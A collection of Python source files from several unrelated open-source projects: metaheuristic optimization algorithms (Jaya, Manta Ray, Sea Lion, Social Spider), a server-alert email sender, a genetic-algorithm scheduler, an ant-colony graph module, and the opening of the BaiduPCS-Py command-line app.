pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class OriginalJA(BaseJA):
"""
The original version of: Jaya Algorithm (JA)
(A simple and new optimization algorithm for solving constrained and unconstrained optimization problems)
Link:
http://www.growingscience.com/ijiec/Vol7/IJIEC_2015_32.pdf
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
pos_new = self.pop[idx][self.ID_POS] + np.random.uniform(0, 1, self.problem.n_dims) * \
(g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) - \
np.random.uniform(0, 1, self.problem.n_dims) * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class LevyJA(BaseJA):
"""
The original version of: Levy-flight Jaya Algorithm (LJA)
(An improved Jaya optimization algorithm with Levy flight)
Link:
+ https://doi.org/10.1016/j.eswa.2020.113902
Note:
+ This version I still remove all third loop in algorithm
+ The beta value of Levy-flight equal to 1.8 as the best value in the paper.
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
L1 = self.get_levy_flight_step(multiplier=1.0, beta=1.0, case=-1)
L2 = self.get_levy_flight_step(multiplier=1.0, beta=1.0, case=-1)
pos_new = self.pop[idx][self.ID_POS] + np.abs(L1) * (g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) - \
np.abs(L2) * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
```
#### File: mealpy/swarm_based/MRFO.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseMRFO(Optimizer):
"""
The original version of: Manta Ray Foraging Optimization (MRFO)
(Manta ray foraging optimization: An effective bio-inspired optimizer for engineering applications)
Link:
https://doi.org/10.1016/j.engappai.2019.103300
"""
def __init__(self, problem, epoch=10000, pop_size=100, somersault_range=2, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
somersault_range (): somersault factor that decides the somersault range of manta rays, default=2
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = 2 * pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.somersault_range = somersault_range
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
# Cyclone foraging (Eq. 5, 6, 7)
if np.random.rand() < 0.5:
r1 = np.random.uniform()
beta = 2 * np.exp(r1 * (self.epoch - epoch) / self.epoch) * np.sin(2 * np.pi * r1)
if (epoch + 1) / self.epoch < np.random.rand():
x_rand = np.random.uniform(self.problem.lb, self.problem.ub)
if idx == 0:
x_t1 = x_rand + np.random.uniform() * (x_rand - self.pop[idx][self.ID_POS]) + \
beta * (x_rand - self.pop[idx][self.ID_POS])
else:
x_t1 = x_rand + np.random.uniform() * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (x_rand - self.pop[idx][self.ID_POS])
else:
if idx == 0:
x_t1 = self.g_best[self.ID_POS] + np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
x_t1 = self.g_best[self.ID_POS] + np.random.uniform() * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
# Chain foraging (Eq. 1,2)
else:
r = np.random.uniform()
alpha = 2 * r * np.sqrt(np.abs(np.log(r)))
if idx == 0:
x_t1 = self.pop[idx][self.ID_POS] + r * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + \
alpha * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
x_t1 = self.pop[idx][self.ID_POS] + r * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
alpha * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
pos_new = self.amend_position_faster(x_t1)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
pop_new = self.greedy_selection_population(self.pop, pop_new)
_, g_best = self.update_global_best_solution(pop_new, save=False)
pop_child = []
for idx in range(0, self.pop_size):
# Somersault foraging (Eq. 8)
x_t1 = pop_new[idx][self.ID_POS] + self.somersault_range * \
(np.random.uniform() * g_best[self.ID_POS] - np.random.uniform() * pop_new[idx][self.ID_POS])
pos_new = self.amend_position_faster(x_t1)
pop_child.append([pos_new, None])
pop_child = self.update_fitness_population(pop_child)
self.pop = self.greedy_selection_population(pop_new, pop_child)
```
#### File: mealpy/swarm_based/SLO.py
```python
import numpy as np
from math import gamma
from copy import deepcopy
from mealpy.optimizer import Optimizer
class BaseSLO(Optimizer):
"""
The original version of: Sea Lion Optimization Algorithm (SLO)
(Sea Lion Optimization Algorithm)
Link:
https://www.researchgate.net/publication/333516932_Sea_Lion_Optimization_Algorithm
DOI: 10.14569/IJACSA.2019.0100548
Notes:
+ The original paper is unclear in some equations and parameters
+ This version is based on my expertise
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
t0 = np.random.rand()
v1 = np.sin(2 * np.pi * t0)
v2 = np.sin(2 * np.pi * (1 - t0))
SP_leader = np.abs(v1 * (1 + v2) / v2) # In the paper this is not clear how to calculate
pop_new = []
for idx in range(0, self.pop_size):
if SP_leader < 0.25:
if c < 1:
pos_new = self.g_best[self.ID_POS] - c * np.abs(2 * np.random.rand() *
self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
ri = np.random.choice(list(set(range(0, self.pop_size)) - {idx})) # random index
pos_new = self.pop[ri][self.ID_POS] - c * np.abs(2 * np.random.rand() *
self.pop[ri][self.ID_POS] - self.pop[idx][self.ID_POS])
else:
pos_new = np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) * \
np.cos(2 * np.pi * np.random.uniform(-1, 1)) + self.g_best[self.ID_POS]
# In the paper doesn't check also doesn't update old solution at this point
pos_new = self.amend_position_random(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
class ModifiedSLO(Optimizer):
"""
My modified version of: Sea Lion Optimization (ISLO)
(Sea Lion Optimization Algorithm)
Noted:
+ Using the idea of shrink encircling combine with levy flight techniques
+ Also using the idea of local best in PSO
"""
ID_LOC_POS = 2
ID_LOC_FIT = 3
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def create_solution(self):
"""
Returns:
The position position with 2 element: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
## Increase exploration at the first initial population using opposition-based learning.
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
local_pos = self.problem.lb + self.problem.ub - position
local_fit = self.get_fitness_position(local_pos)
if fitness < local_fit:
return [local_pos, local_fit, position, fitness]
else:
return [position, fitness, local_pos, local_fit]
def _shrink_encircling_levy__(self, current_pos, epoch, dist, c, beta=1):
up = gamma(1 + beta) * np.sin(np.pi * beta / 2)
down = (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2))
xich_ma_1 = np.power(up / down, 1 / beta)
xich_ma_2 = 1
a = np.random.normal(0, xich_ma_1, 1)
b = np.random.normal(0, xich_ma_2, 1)
LB = 0.01 * a / (np.power(np.abs(b), 1 / beta)) * dist * c
D = np.random.uniform(self.problem.lb, self.problem.ub)
levy = LB * D
return (current_pos - np.sqrt(epoch + 1) * np.sign(np.random.random(1) - 0.5)) * levy
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
if c > 1:
pa = 0.3 # At the beginning of the process, the probability for shrinking encircling is small
else:
pa = 0.7 # But at the end of the process, it become larger. Because sea lion are shrinking encircling prey
SP_leader = np.random.uniform(0, 1)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if SP_leader >= 0.6:
pos_new = np.cos(2 * np.pi * np.random.normal(0, 1)) * \
np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + self.g_best[self.ID_POS]
else:
if np.random.uniform() < pa:
dist1 = np.random.uniform() * np.abs(2 * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
pos_new = self._shrink_encircling_levy__(self.pop[idx][self.ID_POS], epoch, dist1, c)
else:
rand_SL = self.pop[np.random.randint(0, self.pop_size)][self.ID_LOC_POS]
rand_SL = 2 * self.g_best[self.ID_POS] - rand_SL
pos_new = rand_SL - c * np.abs(np.random.uniform() * rand_SL - self.pop[idx][self.ID_POS])
agent[self.ID_POS] = self.amend_position_random(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx] = deepcopy(pop_new[idx])
if self.compare_agent(pop_new[idx], [None, self.pop[idx][self.ID_LOC_FIT]]):
self.pop[idx][self.ID_LOC_POS] = deepcopy(pop_new[idx][self.ID_POS])
self.pop[idx][self.ID_LOC_FIT] = deepcopy(pop_new[idx][self.ID_FIT])
class ISLO(ModifiedSLO):
"""
My improved version of: Improved Sea Lion Optimization Algorithm (ISLO)
(Sea Lion Optimization Algorithm)
Link:
https://www.researchgate.net/publication/333516932_Sea_Lion_Optimization_Algorithm
DOI: 10.14569/IJACSA.2019.0100548
"""
def __init__(self, problem, epoch=10000, pop_size=100, c1=1.2, c2=1.2, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.c1 = c1
self.c2 = c2
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
t0 = np.random.rand()
v1 = np.sin(2 * np.pi * t0)
v2 = np.sin(2 * np.pi * (1 - t0))
SP_leader = np.abs(v1 * (1 + v2) / v2)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if SP_leader < 0.5:
if c < 1: # Exploitation improved by historical movement + global best affect
# pos_new = g_best[self.ID_POS] - c * np.abs(2 * rand() * g_best[self.ID_POS] - pop[i][self.ID_POS])
dif1 = np.abs(2 * np.random.rand() * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
dif2 = np.abs(2 * np.random.rand() * self.pop[idx][self.ID_LOC_POS] - self.pop[idx][self.ID_POS])
pos_new = self.c1 * np.random.rand() * (self.pop[idx][self.ID_POS] - c * dif1) + \
self.c2 * np.random.rand() * (self.pop[idx][self.ID_POS] - c * dif2)
else: # Exploration improved by opposition-based learning
# Create a new solution by equation below
# Then create an opposition solution of above solution
# Compare both of them and keep the good one (Searching at both direction)
pos_new = self.g_best[self.ID_POS] + c * np.random.normal(0, 1, self.problem.n_dims) * \
(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
fit_new = self.get_fitness_position(self.amend_position_faster(pos_new))
pos_new_oppo = self.problem.lb + self.problem.ub - self.g_best[self.ID_POS] + \
np.random.rand() * (self.g_best[self.ID_POS] - pos_new)
fit_new_oppo = self.get_fitness_position(self.amend_position_faster(pos_new_oppo))
if self.compare_agent([pos_new_oppo, fit_new_oppo], [pos_new, fit_new]):
pos_new = pos_new_oppo
else: # Exploitation
pos_new = self.g_best[self.ID_POS] + np.cos(2 * np.pi * np.random.uniform(-1, 1)) * \
np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
agent[self.ID_POS] = self.amend_position_random(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx] = deepcopy(pop_new[idx])
if self.compare_agent(pop_new[idx], [None, self.pop[idx][self.ID_LOC_FIT]]):
self.pop[idx][self.ID_LOC_POS] = deepcopy(pop_new[idx][self.ID_POS])
self.pop[idx][self.ID_LOC_FIT] = deepcopy(pop_new[idx][self.ID_FIT])
```
#### File: mealpy/swarm_based/SSpiderA.py
```python
import numpy as np
from copy import deepcopy
from scipy.spatial.distance import cdist
from mealpy.optimizer import Optimizer
class BaseSSpiderA(Optimizer):
"""
My modified version of: Social Spider Algorithm (BaseSSpiderA)
(A social spider algorithm for global optimization)
Link:
https://doi.org/10.1016/j.asoc.2015.02.014
Notes:
+ Changes the idea of intensity, which one has better intensity, others will move toward to it
"""
ID_POS = 0
ID_FIT = 1
ID_INT = 2
ID_TARGET_POS = 3
ID_PREV_MOVE_VEC = 4
ID_MASK = 5
def __init__(self, problem, epoch=10000, pop_size=100, r_a=1, p_c=0.7, p_m=0.1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_a (float): the rate of vibration attenuation when propagating over the spider web, default=1.0
p_c (float): controls the probability of the spiders changing their dimension mask in the random walk step, default=0.7
p_m (float): the probability of each value in a dimension mask to be one, default=0.1
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.r_a = r_a
self.p_c = p_c
self.p_m = p_m
def create_solution(self):
"""
Returns:
The position position with 2 element: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
x: The position of s on the web.
train: The fitness of the current position of s.
target_vibration: The target vibration of s in the previous iteration.
intensity_vibration: intensity of vibration
movement_vector: The movement that s performed in the previous iteration.
dimension_mask: The dimension mask 1 that s employed to guide movement in the previous iteration.
The dimension mask is a 0-1 binary vector of length problem size.
n_changed: The number of iterations since s has last changed its target vibration. (No need)
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position)
intensity = np.log(1. / (abs(fitness[self.ID_TAR]) + self.EPSILON) + 1)
target_position = deepcopy(position)
previous_movement_vector = np.zeros(self.problem.n_dims)
dimension_mask = np.zeros(self.problem.n_dims)
return [position, fitness, intensity, target_position, previous_movement_vector, dimension_mask]
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
all_pos = np.array([it[self.ID_POS] for it in self.pop]) ## Matrix (pop_size, problem_size)
base_distance = np.mean(np.std(all_pos, axis=0)) ## Number
dist = cdist(all_pos, all_pos, 'euclidean')
intensity_source = np.array([it[self.ID_INT] for it in self.pop])
intensity_attenuation = np.exp(-dist / (base_distance * self.r_a)) ## vector (pop_size)
intensity_receive = np.dot(np.reshape(intensity_source, (1, self.pop_size)), intensity_attenuation) ## vector (1, pop_size)
id_best_intennsity = np.argmax(intensity_receive)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if self.pop[id_best_intennsity][self.ID_INT] > self.pop[idx][self.ID_INT]:
agent[self.ID_TARGET_POS] = self.pop[id_best_intennsity][self.ID_TARGET_POS]
if np.random.uniform() > self.p_c: ## changing mask
agent[self.ID_MASK] = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.p_m, 0, 1)
pos_new = np.where(self.pop[idx][self.ID_MASK] == 0, self.pop[idx][self.ID_TARGET_POS],
self.pop[np.random.randint(0, self.pop_size)][self.ID_POS])
## Perform random walk
pos_new = self.pop[idx][self.ID_POS] + np.random.normal() * \
(self.pop[idx][self.ID_POS] - self.pop[idx][self.ID_PREV_MOVE_VEC]) + \
(pos_new - self.pop[idx][self.ID_POS]) * np.random.normal()
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx][self.ID_PREV_MOVE_VEC] = pop_new[idx][self.ID_POS] - self.pop[idx][self.ID_POS]
self.pop[idx][self.ID_INT] = np.log(1. / (abs(pop_new[idx][self.ID_FIT][self.ID_TAR]) + self.EPSILON) + 1)
self.pop[idx][self.ID_POS] = pop_new[idx][self.ID_POS]
self.pop[idx][self.ID_FIT] = pop_new[idx][self.ID_FIT]
# class OriginalSSA(Root):
# """
# The original version of: Social Spider Algorithm (SSA)
# (Social Spider Algorithm - A social spider algorithm for global optimization)
# Link:
# + Taken from Github: https://github.com/James-Yu/SocialSpiderAlgorithm
# + Slow convergence
# """
#
# def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
# r_a=1, p_c=0.7, p_m=0.1, **kwargs):
# super().__init__(obj_func, lb, ub, verbose, kwargs)
# self.epoch = epoch
# self.pop_size = pop_size
# self.r_a = r_a # the rate of vibration attenuation when propagating over the spider web.
# self.p_c = p_c # controls the probability of the spiders changing their dimension mask in the random walk step.
# self.p_m = p_m # the probability of each value in a dimension mask to be one
#
# def train(self):
#
# g_best = [np.zeros(self.problem_size), np.Inf]
# self.position = np.random.uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
# target_position = deepcopy(self.position)
# target_intensity = np.zeros(self.pop_size)
# mask = np.zeros((self.pop_size, self.problem_size))
# movement = np.zeros((self.pop_size, self.problem_size))
# inactive = np.zeros(self.pop_size)
#
# epoch = 0
# while (epoch < self.epoch):
# epoch += 1
# spider_fitness = np.array([self.get_fitness_position(self.position[i]) for i in range(self.pop_size)])
# base_distance = np.mean(np.std(self.position, 0))
# distance = cdist(self.position, self.position, 'euclidean')
#
# intensity_source = np.log(1. / (spider_fitness + self.EPSILON) + 1)
# intensity_attenuation = np.exp(-distance / (base_distance * self.r_a))
# intensity_receive = np.tile(intensity_source, self.pop_size).np.reshape(self.pop_size, self.pop_size) * intensity_attenuation
#
# max_index = np.argmax(intensity_receive, axis=1)
# keep_target = intensity_receive[np.arange(self.pop_size), max_index] <= target_intensity
# keep_target_matrix = np.repeat(keep_target, self.problem_size).np.reshape(self.pop_size, self.problem_size)
# inactive = inactive * keep_target + keep_target
# target_intensity = target_intensity * keep_target + intensity_receive[np.arange(self.pop_size), max_index] * (1 - keep_target)
# target_position = target_position * keep_target_matrix + self.position[max_index] * (1 - keep_target_matrix)
#
# rand_position = self.position[np.floor(rand(self.pop_size * self.problem_size) * self.pop_size).astype(int), \
# np.tile(np.arange(self.problem_size), self.pop_size)].np.reshape(self.pop_size, self.problem_size)
# new_mask = np.ceil(rand(self.pop_size, self.problem_size) + rand() * self.p_m - 1)
# keep_mask = rand(self.pop_size) < self.p_c ** inactive
# inactive = inactive * keep_mask
# keep_mask_matrix = np.repeat(keep_mask, self.problem_size).np.reshape(self.pop_size, self.problem_size)
# mask = keep_mask_matrix * mask + (1 - keep_mask_matrix) * new_mask
#
# follow_position = mask * rand_position + (1 - mask) * target_position
# movement = np.repeat(rand(self.pop_size), self.problem_size).np.reshape(self.pop_size, self.problem_size) * movement + \
# (follow_position - self.position) * rand(self.pop_size, self.problem_size)
# self.position = self.position + movement
#
# if min(spider_fitness) < g_best[self.ID_FIT]:
# g_best = deepcopy([self.position[argmin(spider_fitness)]), min(spider_fitness)]
#
# self.loss_train.append(g_best[self.ID_FIT])
# if self.verbose:
# print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
# self.solution = g_best
# return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
``` |
{
"source": "JokerHB/ServerMonitor",
"score": 3
} |
#### File: JokerHB/ServerMonitor/Email.py
```python
import smtplib
import copy
import time
import Loger
import Configure
from email.mime.text import MIMEText
from email.header import Header
from email.utils import parseaddr, formataddr
class Email(object):
# sender predefine
# region
sender = ''
mail_host = ''
mail_user = ''
mail_pass = ''
# endregion
def __init__(self, receiver = None):
# config = Configure.Configure('./config.xml')
# self.logger = Loger.Loger(config.getLogFilePath())
if receiver == None:
self.receivers = []
else:
self.receivers = copy.deepcopy(receiver)
def sendBaseMail(self, content, receiver, logger):
msg = MIMEText(_text=content, _subtype='plain', _charset='utf-8')
msg['From'] = self.addressFormat('Server Alert <%s>' % self.sender)
msg['To'] = self.addressFormat('Admin <%s>' % receiver)
msg['Subject'] = Header('Server Alert', 'utf-8').encode()
msg['date'] = time.strftime('%a, %d %b %Y %H:%M:%S %z')
try:
smtpObj = smtplib.SMTP()
smtpObj.connect(self.mail_host, 25)
# smtpObj.set_debuglevel(1)
smtpObj.login(self.mail_user, self.mail_pass)
smtpObj.sendmail(self.sender, receiver, msg.as_string())
smtpObj.quit()
except:
# print 'send %s failed' % receiver
logger.log_Error('EMAIL_SEND_FAILED %s' % receiver)
def sendMails(self, content, receviers, logger):
for recv in receviers:
self.sendBaseMail(content, recv, logger)
def addressFormat(self, add):
name, address = parseaddr(add)
return formataddr((Header(name, 'utf-8').encode(), address))
def setBaseInfo(self, info):
self.mail_host = info.host
self.mail_pass = info.password
self.mail_user = info.user
self.sender = info.sender
``` |
{
"source": "JokerHB/SingleDispatch",
"score": 3
} |
#### File: SingleDispatch/HeredityPart/Heredity.py
```python
import HeredityPart.Corss as hpc
import HeredityPart.Individual as hpi
import HeredityPart.Modules as hpm
from copy import deepcopy
from random import choice
class Heredity(object):
def __init__(self, jobs, mach,crossRate = 0.9, abnormalRate = 1.0, times = 10, indiNum = 100):
"""
init the heredity algorithm
:param jobs: whole job sequence
:param mach: the match of job and machine
:param crossRate: the rate of the cross operation
:param abnormalRate: the rate of the abnormal operation
:param times: the iter time
:param indiNum: individual number
"""
self.CRate = crossRate
self.ARate = abnormalRate
self.times = times
self.indiNum = indiNum
self.individuals = []
self.randomInit(jobs, mach)
def run(self):
for i in range(self.times):
# evaluate
for id in self.individuals:
try:
id.Evaluate()
except Exception, e:
print 'error_run_23 ' + str(e)
# cross and abnormal
self.individuals.sort(cmp=hpm.cmp)
pos = int(len(self.individuals) * self.CRate)
if pos == len(self.individuals):
pos -= 1
if len(self.individuals) == 0:
print 'error'
_cross = hpm.getRange(self.individuals, 0, pos)
_abnormal = hpm.getRange(self.individuals, pos, len(self.individuals))
new_cross = []
for j in range(0, len(_cross), 2):
try:
if j == len(_cross) - 1:
a, b = hpc.DoCorss(_cross[j], _cross[j])
new_cross.append(a)
new_cross.append(b)
break
a,b = hpc.DoCorss(_cross[j], _cross[j + 1])
new_cross.append(a)
new_cross.append(b)
except Exception,e:
print 'error_heredity_46 ' + str(e)
for j in _abnormal:
j.Abnormal(self.ARate)
for _ in _abnormal:
new_cross.append(_)
self.individuals = new_cross
def randomInit(self, job, match):
for i in range(self.indiNum):
_job = deepcopy(job)
ranJob = []
for __ in range(len(job)):
___ = choice(_job)
ranJob.append(___)
_job.remove(___)
_ = hpi.Individual(job = deepcopy(ranJob), mach=deepcopy(match))
self.individuals.append(_)
def output(self):
self.individuals.sort(cmp=hpm.cmp)
self.individuals[0].display()
def getBest(self):
return self.individuals[0]
``` |
{
"source": "JokerHB/XY",
"score": 3
} |
#### File: XY/ACO/Ants.py
```python
import os
import Simulate
from copy import deepcopy
from random import randint
from random import choice
class Ants(object):
def __init__(self, graph, alpha, beta):
'''
init functon of Ants
'''
self._graph = deepcopy(graph)
self._alpha = alpha
self._beta = beta
self._length = randint(1, len(self._graph._edge))
self._currentPoint = choice(self._graph._edge)._startPoint
self._path = [self._currentPoint]
self._value = 0.0
def MoveToNextEdge(self):
for i in range(1, self._length):
node = -1
p = -1
edge = None
for e in self._graph._edge:
if node == -1:
p = (e._pheromone ** self._alpha) * (e._display ** self._beta)
node = e._endPoint
edge = e
elif e._startPoint == self._currentPoint and e._endPoint not in self._path:
if (e._pheromone ** self._alpha) * (e._display ** self._beta) > p:
p = e._pheromone
node = e._endPoint
edge = e
if edge != None:
self._path.append(node)
self._currentPoint = node
self._graph._edge.remove(edge)
else:
break
# self._graph.UpdateDegree()
self._value = self._graph.GetModularity()
def ResetAnt(self, graph, alpha, beta):
self._graph = deepcopy(graph)
self._alpha = alpha
self._beta = beta
self._length = randint(1, len(self._graph._edge))
self._currentPoint = choice(self._graph._edge)._startPoint
self._path = [self._currentPoint]
self._value = 0.0
def IsPassEdge(self, startPoint, endPoint):
if startPoint not in self._path or endPoint not in self._path:
return False
sp = self._path.index(startPoint)
ep = self._path.index(endPoint)
if abs(sp - ep) == 1:
return True
return False
``` |
{
"source": "joker-i5700/BaiduPCS-Py",
"score": 2
} |
#### File: baidupcs_py/app/app.py
```python
from typing import Optional
from collections import OrderedDict
from functools import wraps
import os
import signal
from pathlib import Path
from baidupcs_py import __version__
from baidupcs_py.baidupcs import BaiduPCSApi, BaiduPCSError
from baidupcs_py.app.account import Account, AccountManager, DEFAULT_DATA_PATH
from baidupcs_py.common.progress_bar import _progress
from baidupcs_py.common.path import join_path
from baidupcs_py.commands.sifter import (
IncludeSifter,
ExcludeSifter,
IsFileSifter,
IsDirSifter,
)
from baidupcs_py.commands.display import display_user_info, display_user_infos
from baidupcs_py.commands.list_files import list_files
from baidupcs_py.commands.cat import cat as _cat
from baidupcs_py.commands import file_operators
from baidupcs_py.commands.search import search as _search
from baidupcs_py.commands import cloud as _cloud
from baidupcs_py.commands.download import (
download as _download,
Downloader,
DownloadParams,
DEFAULT_DOWNLOADER,
DEFAULT_CONCURRENCY,
DEFAULT_CHUNK_SIZE,
)
from baidupcs_py.commands.play import play as _play, Player, DEFAULT_PLAYER
from baidupcs_py.commands.upload import upload as _upload, from_tos, CPU_NUM
from baidupcs_py.commands.sync import sync as _sync
from baidupcs_py.commands import share as _share
import click
from rich import print
from rich.prompt import Prompt, Confirm
from rich.console import Console
DEBUG = os.getenv("DEBUG")
def handle_signal(sign_num, frame):
if _progress._started:
print()
# Stop _progress, otherwise terminal stdout will be contaminated
_progress.stop()
# No use sys.exit() which only exits the main thread
os._exit(1)
signal.signal(signal.SIGINT, handle_signal)
def handle_error(func):
"""Handle command error wrapper"""
@wraps(func)
def wrap(*args, **kwargs):
try:
return func(*args, **kwargs)
except BaiduPCSError as err:
print(f"(v{__version__}) [bold red]ERROR[/bold red]: BaiduPCSError: {err}")
if DEBUG:
console = Console()
console.print_exception()
except Exception as err:
print(f"(v{__version__}) [bold red]System ERROR[/bold red]: {err}")
if DEBUG:
console = Console()
console.print_exception()
return wrap
def _recent_api(ctx) -> Optional[BaiduPCSApi]:
"""Return recent user's `BaiduPCSApi`"""
am = ctx.obj.account_manager
account = am.who()
if not account:
print("[italic red]No recent user, please adding or selecting one[/]")
return None
return account.pcsapi()
def _pwd(ctx) -> Path:
"""Return recent user's pwd"""
am = ctx.obj.account_manager
return Path(am.pwd)
ALIAS = OrderedDict(
**{
"w": "who",
"uu": "updateuser",
"su": "su",
"ul": "userlist",
"ua": "useradd",
"ud": "userdel",
"l": "ls",
"f": "search",
"md": "mkdir",
"mv": "move",
"rn": "rename",
"cp": "copy",
"rm": "remove",
"d": "download",
"p": "play",
"u": "upload",
"sn": "sync",
"S": "share",
"sl": "shared",
"cs": "cancelshared",
"s": "save",
"a": "add",
"t": "tasks",
"ct": "cleartasks",
"cct": "canceltasks",
}
)
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
# As normal command name
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
# Check alias command name
if cmd_name not in ALIAS:
ctx.fail(f"No command: {cmd_name}")
normal_cmd_name = ALIAS[cmd_name]
return click.Group.get_command(self, ctx, normal_cmd_name)
def list_commands(self, ctx):
return self.commands
_APP_DOC = f"""BaiduPCS App v{__version__}
\b
如果第一次使用,你需要运行 `BaiduPCS-Py useradd` 添加 `bduss` 和 `cookies`。
